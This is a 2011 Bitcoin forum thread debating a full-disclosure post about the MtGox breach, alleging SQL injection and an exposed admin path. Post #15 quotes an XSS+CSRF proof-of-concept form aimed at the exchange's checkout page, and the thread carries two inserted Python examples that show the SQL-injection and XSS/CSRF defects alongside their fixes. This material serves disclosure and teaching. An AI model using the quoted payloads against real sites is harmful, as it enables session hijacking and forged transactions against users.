Bitcoin Forum
Topic: [Full Disclosure] More likely MtGox Post-Mortem (Read 21298 times)

jrmithdobbs (Jr. Member, Activity: 59)
June 21, 2011, 04:35:20 AM #1

More full disclosure! More fun!

I have two independent sources claiming known SQLi vulnerabilities in MtGox.

One of said SQLi vulnerabilities was confirmed to be patched on the 16th.
The other was not patched, to anyone's knowledge, at the time of the market crash and database leak. The one that was not patched could have plausibly been used to dump the user table.

The details follow in these chat logs. POC for the referenced xss+csrf is also provided. Whether or not it is still an issue is not known for sure at this time as the site cannot be accessed.

It has also been found that MtGox exposes its admin user interface even if a user does not have the admin flag set on their account. As of now it is thought that most actions attempted to be used will throw permission errors. Once again, this cannot be confirmed at this time. https://mtgox.com/app/webroot/code/admin

MagicalTux, now that your claim "The site was not compromised with a SQL injection as many are reporting, so in effect the site was not hacked." Please respond. The truth this time.

MagicalTux's official response at the time of this writing is also attached. It is available at:
https://support.mtgox.com/entries/20208066-huge-bitcoin-sell-off-due-to-a-compromised-account-rollback

These logs are not modified except for users' hostmasks at their request, due to MagicalTux's newfound policy of committing libel against his users based on login logs, since he apparently doesn't keep order book logs for orders that go through immediately, by his own admission. Classy.

Mirrors:
http://privatepaste.com/93e8a9cd64 (#bitcoin-hax log)
http://privatepaste.com/47a50cab5b (sig)
http://www.mediafire.com/?m7o4z3oz9nyd3v3 (#bitcoin-hax log)
http://www.mediafire.com/?nzcpa5mwpw9ccbb (sig)
http://privatepaste.com/e4bacfae37 (PovAddict log)
http://privatepaste.com/9dc5daf8a0 (sig)
http://www.mediafire.com/?bflr76anvv835ib (PovAddict log)
http://www.mediafire.com/?rl250c2dahw7dx9 (sig)
http://privatepaste.com/6dad3927d6 (XSS + CSRF)
http://privatepaste.com/45e5aa0d30 (sig)
http://www.mediafire.com/?synt5sjcbkl9zvq (XSS + CSRF)
http://www.mediafire.com/?uv7be34198pseoo (sig)

f-d: http://lists.grok.org.uk/pipermail/full-disclosure/2011-June/081582.html
Message is awaiting approval on bitcoin-list and bitcoin-development lists.

Edit: sourceforge list link (attachment-less reply)
http://sourceforge.net/mailarchive/forum.php?thread_name=D091767C-EF92-4B63-9C29-924F32AE34D7%40jrbobdobbs.org&forum_name=bitcoin-development

1B8TSDzXdyTRX5eF77gWQoXujBaDtKFE6H
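The post names SQL injection as the likely route to the user table but gives no detail of the flaw itself. The following is an added example, not code from MtGox or from the poster: it shows the general defect behind every SQLi, a request parameter concatenated into the query text so the database parses user-controlled characters as SQL, beside the bound-parameter form that fixes it. The table, column names and sample rows are constructed; a login containing an apostrophe ("o'brien") is enough to show the concatenated query handing user data to the SQL parser, while the parameterized query treats it as plain data.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory user table standing in for the one the post says could be dumped."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, email TEXT, pw_hash TEXT)"
    )
    # Sample rows (constructed); the hashes are placeholders, not real digests.
    conn.executemany(
        "INSERT INTO users (login, email, pw_hash) VALUES (?, ?, ?)",
        [
            ("alice", "alice@example.invalid", "hash-a"),
            ("bob", "bob@example.invalid", "hash-b"),
            ("o'brien", "obrien@example.invalid", "hash-c"),
        ],
    )
    return conn


def find_user_concat(conn: sqlite3.Connection, login: str) -> list:
    """Query text assembled from the request parameter: the SQL injection pattern.
    Any quote, comment marker or operator in `login` becomes part of the statement."""
    sql = "SELECT login, email, pw_hash FROM users WHERE login = '" + login + "'"
    return conn.execute(sql).fetchall()


def find_user_param(conn: sqlite3.Connection, login: str) -> list:
    """Same lookup with a bound parameter: the driver sends the value separately
    from the statement, so it is always data and never SQL, whatever it contains."""
    return conn.execute(
        "SELECT login, email, pw_hash FROM users WHERE login = ?", (login,)
    ).fetchall()


def concat_query_breaks(conn: sqlite3.Connection, login: str) -> bool:
    """True when the concatenated query fails to parse for this input, i.e. when the
    input reached the SQL parser as syntax rather than as a string value."""
    try:
        find_user_concat(conn, login)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("param  o'brien ->", find_user_param(db, "o'brien"))
    print("concat o'brien breaks the statement:", concat_query_breaks(db, "o'brien"))
```

The parse error is the benign symptom; the same mechanism lets crafted input change the statement's meaning, which is why the remediation is binding parameters everywhere rather than filtering characters.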
gmaxwell (Staff, Legendary, Activity: 2030)
June 21, 2011, 04:44:33 AM #2

Not mentioned here is the fact that dozens of MTGOX hashed passwords were quietly disclosed on a hash cracking forum on Fri Jun 17, 2011 5:21 am
(http://forum.insidepro.com/viewtopic.php?t=9124&postdays=0&postorder=asc&start=75&sid=1a9e31567fe815c0eea63c40c39fb707 post by "georgeclooney")

Since the overwhelming majority but not all of the hashes match the mtgox database that was posted on this forum (now deleted) and elsewhere I suspect that this post may have been generated from an earlier dump than was disclosed on the forums and everywhere else after the big event.

This appears to be significantly ahead of the prior claimed breach, and is consistent with the great many other mtgox users claiming that their accounts were robbed prior to the big event on Sunday, which I believe would have been too early to be results of the mtgox database leak according to the official timeline re: auditor compromise.
jrmithdobbs (Jr. Member, Activity: 59)
June 21, 2011, 04:50:05 AM #3

Quote from: gmaxwell
Not mentioned here is the fact that dozens of MTGOX hashed passwords were quietly disclosed on a hash cracking forum on Fri Jun 17, 2011 5:21 am
(http://forum.insidepro.com/viewtopic.php?t=9124&postdays=0&postorder=asc&start=75&sid=1a9e31567fe815c0eea63c40c39fb707 post by "georgeclooney")

Since the overwhelming majority but not all of the hashes match the mtgox database that was posted on this forum (now deleted) and elsewhere I suspect that this post may have been generated from an earlier dump than was disclosed on the forums and everywhere else after the big event.

This appears to be significantly ahead of the prior claimed breach, and is consistent with the great many other mtgox users claiming that their accounts were robbed prior to the big event on Sunday, which I believe would have been too early to be results of the mtgox database leak according to the official timeline re: auditor compromise.


Whoops, forgot to add that. Added to f-d thread.

1B8TSDzXdyTRX5eF77gWQoXujBaDtKFE6H
chuckypalumbo (Jr. Member, Activity: 56)
June 21, 2011, 04:54:41 AM #4

Quote from: gmaxwell
Not mentioned here is the fact that dozens of MTGOX hashed passwords were quietly disclosed on a hash cracking forum on Fri Jun 17, 2011 5:21 am
(http://forum.insidepro.com/viewtopic.php?t=9124&postdays=0&postorder=asc&start=75&sid=1a9e31567fe815c0eea63c40c39fb707 post by "georgeclooney")

Since the overwhelming majority but not all of the hashes match the mtgox database that was posted on this forum (now deleted) and elsewhere I suspect that this post may have been generated from an earlier dump than was disclosed on the forums and everywhere else after the big event.

This appears to be significantly ahead of the prior claimed breach, and is consistent with the great many other mtgox users claiming that their accounts were robbed prior to the big event on Sunday, which I believe would have been too early to be results of the mtgox database leak according to the official timeline re: auditor compromise.


Jesus Christ.....

If you're looking to sign up for an exchange try Bitcoin7 or Tradehill, referral codes are listed below. Sign up for Tradehill and get 10% off of every trade you ever make.

https://www.bitcoin7.com/?ref=6383

http://www.tradehill.com/?r=TH-R15532
Phil21 (Full Member, Activity: 152)
June 21, 2011, 05:02:58 AM #5

People should read this.  All of it, even if it's boring to you.

This is what professional security teams do.  They do not blame their users for a hack that didn't happen in the first place (read: a user's account password being compromised likely was NOT the 500k selloff - at least by itself)

As I said in previous posts, the truth will come out one way or the other.  MT claiming his site is "safe" pretty much was the writing on the wall in that regard Smiley

I've made plenty of stupid ass security mistakes I'm completely embarrassed to admit to.  However, I've also admitted my mistakes and made conscious efforts to improve whenever I learn about something new.

joepie91 (Sr. Member, Activity: 294)
June 21, 2011, 05:06:25 AM #6

I told you so...

Like my post(s)? 12TSXLa5Tu6ag4PNYCwKKSiZsaSCpAjzpu Smiley
Quote from: hawks5999
I just can't wait for fall/winter. My furnace never generated money for me before. I'll keep mining until my furnace is more profitable.
Hook^ (Jr. Member, Activity: 56)
June 21, 2011, 05:16:47 AM #7

Quote from: joepie91
I told you so...
Speak up, I can't hear you.
nhodges (Sr. Member, Activity: 308)
June 21, 2011, 05:20:59 AM #8

I think this is just the icing on the cake, but now there is no allegation of scandal at Mt. Gox, it is fact.

dana.powers (Newbie, Activity: 21)
June 21, 2011, 05:23:49 AM #9

Thank you for posting.  The theory seems credible and is, at the least, a very interesting read.

Question: what was the purpose of https://mtgox.com/claim ?
Bit_Happy (Legendary, Activity: 1442)
A Great Time to Start Something!
June 21, 2011, 05:24:28 AM #10

Quote from: nhodges
I think this is just the icing on the cake, but now there is no allegation of scandal at Mt. Gox, it is fact.

Fact?
What are his two independent sources, and why can they be trusted?
Exactly how do the posted links prove anything, in plain, simple English so everyone can understand, please?

15DYJpWJe9H1YofsNQbP9JEWWNn7XPZgbS
Bit_Happy (Legendary, Activity: 1442)
A Great Time to Start Something!
June 21, 2011, 05:25:59 AM #11

Quote from: dana.powers
Thank you for posting.  The theory seems credible and is, at the least, a very interesting read.

Question: what was the purpose of https://mtgox.com/claim ?

Claim = Re-claim Your account.
Verify your email and change your password.

15DYJpWJe9H1YofsNQbP9JEWWNn7XPZgbS
niemivh (Full Member, Activity: 196)
June 21, 2011, 05:26:28 AM #12

Praise god I only have a little of my BTC on MtGox.

I guess this teaches us not to all use 1 centralized site that used to sell Magic the Gathering cards.

We need about a dozen exchanges each with robust security and FDIC insurance.

 Cheesy

I'll keep my politics out of your economics if you keep your economics out of my politics.

16LdMA6pCgq9ULrstHmiwwwbGe1BJQyDqr
brunner (Newbie, Activity: 14)
June 21, 2011, 05:29:57 AM #13

I agree that everyone should read this.

So, assuming the one 'user' with 500k BTC was MagicalTux, or someone close to him:

1) Gox launches with Swiss cheese for security
2) Gox ignores all warnings about being vulnerable, and continues to tell users they're safe
3) Gox gets hacked
4) Magical Tux's BTC gets sold for pennies
5) Magical Tux wants to roll back the transactions to get his bitcoin back

Am I missing something?
Hook^ (Jr. Member, Activity: 56)
June 21, 2011, 05:33:03 AM #14

Quote from: brunner
I agree that everyone should read this.

So, assuming the one 'user' with 500k BTC was MagicalTux, or someone close to him:

1) Gox launches with Swiss cheese for security
2) Gox ignores all warnings about being vulnerable, and continues to tell users they're safe
3) Gox gets hacked
4) Magical Tux's BTC gets sold for pennies
5) Magical Tux wants to roll back the transactions to get his bitcoin back

Am I missing something?
Magical Tux probably doesn't have 500k BTC.  Perhaps everyone on the site combined would add up to 500k BTC.  I think every bitcoin on the site got liquidated.  So he is backing it out.  The problem is whether the coins got transferred out before he caught the transaction.
Bit_Happy (Legendary, Activity: 1442)
A Great Time to Start Something!
June 21, 2011, 05:33:18 AM #15

IMO, anyone starting a post like this needs to be able to demonstrate exactly where the attack part of this code is:

Code:
<body onload="/*document.forms['foo'].submit()*/">
<form id="foo" action="https://mtgox.com/merch/checkout" method="post" >
<input type="hidden" name="notify_url" value="http://yourdomain.com/ipn.php&quot;})}alert(1);function blah(){test({5:&quot;">
<input type="hidden" name="business" value="foobar">
<input type="hidden" name="currency_code" value="USD">
<input type="hidden" name="item_name" value="Your Item Name<script>alert(1);</script>">
<input type="hidden" name="custom" value="your custom msg to yourself&quot;})}alert(1);function blah(){test({5:&quot;" >
<input type="hidden" name="amount" value="10.30">
<input type="hidden" name="return" value="http://yourdomain.com/thanks">
<!--<input type="hidden" name="return" value="http://yourdomain.com/thanks&quot;;}alert(1);</script><script>">-->
<input type="submit" value="Pay with Mt Gox" />
</form>


If you can show me (us) the "bad parts" and be correct, then thank you for posting this.
If you can't then (at best) you are acting without thinking things through.
Thank you

15DYJpWJe9H1YofsNQbP9JEWWNn7XPZgbS
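The POC quoted above is only an HTML form; whether it does anything depends on what the checkout page does with the posted fields. As an added example (not MtGox's code and not from anyone in the thread), here is a constructed page template that drops `item_name` into HTML text and `custom` into an inline script the way the payloads assume (the `"})}` sequence closes a JS string, an object literal, a call and a function body, then `alert(1)` runs), beside the same template with context-aware encoding, plus the session-bound token check that makes a cross-site auto-submitting form fail. The template, function names and session layout are assumptions; the field values are taken from the POC's own form.

```python
import hmac
import html
import json
import secrets

# Field values with the same shape as the POC form above (constructed test input).
POC_FIELDS = {
    "item_name": "Your Item Name<script>alert(1);</script>",
    "custom": 'your custom msg to yourself"})}alert(1);function blah(){test({5:"',
    "amount": "10.30",
}


def encode_for_html(value: str) -> str:
    """HTML text and attribute context: escape &, <, >, " and '."""
    return html.escape(value, quote=True)


def encode_for_js_string(value: str) -> str:
    """Inline <script> string context: emit a JSON string literal (quotes and
    control characters escaped) and also neutralise '</' so the value can
    never close the surrounding <script> element."""
    return json.dumps(value).replace("</", "<\\/")


def render_unsafe(fields: dict) -> str:
    """Raw interpolation into both contexts: the pattern the POC relies on.
    (Constructed template; the real checkout page is not on the forum.)"""
    return (
        "<h1>" + fields["item_name"] + "</h1>\n"
        '<script>function onNotify(){test({5:"' + fields["custom"] + '"})}</script>\n'
    )


def render_safe(fields: dict) -> str:
    """Same template, each value encoded for the context it lands in."""
    return (
        "<h1>" + encode_for_html(fields["item_name"]) + "</h1>\n"
        "<script>function onNotify(){test({5:"
        + encode_for_js_string(fields["custom"])
        + "})}</script>\n"
    )


def count_script_tags(markup: str) -> int:
    """How many <script> elements the browser would see in the rendered page."""
    return markup.count("<script>")


def issue_csrf_token(session: dict) -> str:
    """Bind a fresh random token to the server-side session; the genuine
    checkout form carries it in a hidden field."""
    session["csrf"] = secrets.token_urlsafe(32)
    return session["csrf"]


def verify_csrf(session: dict, form: dict) -> bool:
    """Reject any POST whose token is absent or differs from the session's.
    A form auto-submitted from a third-party page cannot read the token and
    so cannot supply it; the comparison is constant-time."""
    expected = session.get("csrf")
    submitted = form.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())


if __name__ == "__main__":
    print("unsafe:", count_script_tags(render_unsafe(POC_FIELDS)), "script elements")
    print("safe:  ", count_script_tags(render_safe(POC_FIELDS)), "script element")
    sess = {}
    issue_csrf_token(sess)
    print("POC form accepted without token:", verify_csrf(sess, POC_FIELDS))
```

The two halves address the two halves of the POC's name: encoding per output context removes the XSS, and the session-bound token removes the CSRF, since the cross-origin page that auto-submits the form cannot read the victim's token. In the safe rendering the payload text is still present but inert, which is the property to check when reviewing a fix.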
Bind (Sr. Member, Activity: 252)
DO NOT ACCEPT PAYPAL FOR BTC YOU WILL GET BURNED
June 21, 2011, 05:44:27 AM #16

... Or it's all fabricated to make TradeHill look more secure in the eyes of the members of this forum.

The only reason I say that possibility is because, by their own admission, they checked out all the major bitcoin sites and exchanges for vulnerabilities, and said nothing good or bad about them. Yet, decided to zone in on TradeHill as being the best in terms of security, while neglecting to state why the others did not deserve equal mention.

Why?

If their security was so bad would it not deserve to be blasted like they did mtgox?

If they had good security would they not deserve to be mentioned like Tradehill ?

Plus the request to have TradeHill removed from the logs is quite possibly a disinformation ruse to attempt to invalidate the possibility I just mentioned. (like omg,  why would i ask for tradehill to be removed if i was whoring for it?)

Regardless of the truth, it will never be able to be "proven" since, even if it is all true, the holes will be plugged by the time mtgox goes live.

Which is what we all want. A more secure market. (minus the drama please)

"... He is no fool who parts with that which he cannot keep, when he is sure to be recompensed with that which he cannot lose ..."

"... history disseminated to the masses is written by those who win battles and wars and murder their heroes ..."


1Dr3ig3EoBnPWq8JZrRTi8Hfp53Kj
Bit_Happy (Legendary, Activity: 1442)
A Great Time to Start Something!
June 21, 2011, 05:46:23 AM #17

Quote from: Bind
... Or it's all fabricated to make TradeHill look more secure in the eyes of the members of this forum.
...

Hi Bind link,
Do you know Tradehill is on shared hosting?
LOL!

15DYJpWJe9H1YofsNQbP9JEWWNn7XPZgbS
jrmithdobbs (Jr. Member, Activity: 59)
June 21, 2011, 05:47:51 AM #18

Quote from: Bind
... Or it's all fabricated to make TradeHill look more secure in the eyes of the members of this forum.

I do not endorse tradehill. If you read the entire log the person who made the tradehill comments asked that they be removed from the posted log. I refused. I am not a blatant hypocrite.

I do not have a tradehill account.

I do not endorse tradehill as an exchange.

I am not in any way affiliated with tradehill.

I think tradehill is bad for bitcoin because of their blatant disregard for US financial laws and dependence on third world outsourced devs working on closed source software that cannot be publicly audited.

Now that that's out of the way, back to your regularly scheduled good times!

1B8TSDzXdyTRX5eF77gWQoXujBaDtKFE6H
Bit_Happy (Legendary, Activity: 1442)
A Great Time to Start Something!
June 21, 2011, 05:51:34 AM #19

Quote from: jrmithdobbs
...
Now that that's out of the way, back to your regularly scheduled good times!

Please, answer the questions in post #10 and #15, or are you avoiding them?

15DYJpWJe9H1YofsNQbP9JEWWNn7XPZgbS
jrmithdobbs (Jr. Member, Activity: 59)
June 21, 2011, 05:59:51 AM #20

Quote from: Bit_Happy
Quote from: jrmithdobbs
...
Now that that's out of the way, back to your regularly scheduled good times!

Please, answer the questions in post #10 and #15, or are you avoiding them?

#15 will not be responded to. This is common practice to prevent people who do not understand the issue at hand from making use of the exploit.

#10 will not be responded to. If these sources wanted to be named they would have taken me up on my offer to gpg sign the logs. They are afraid of MagicalTux's blamecannon getting pointed their way.

1B8TSDzXdyTRX5eF77gWQoXujBaDtKFE6H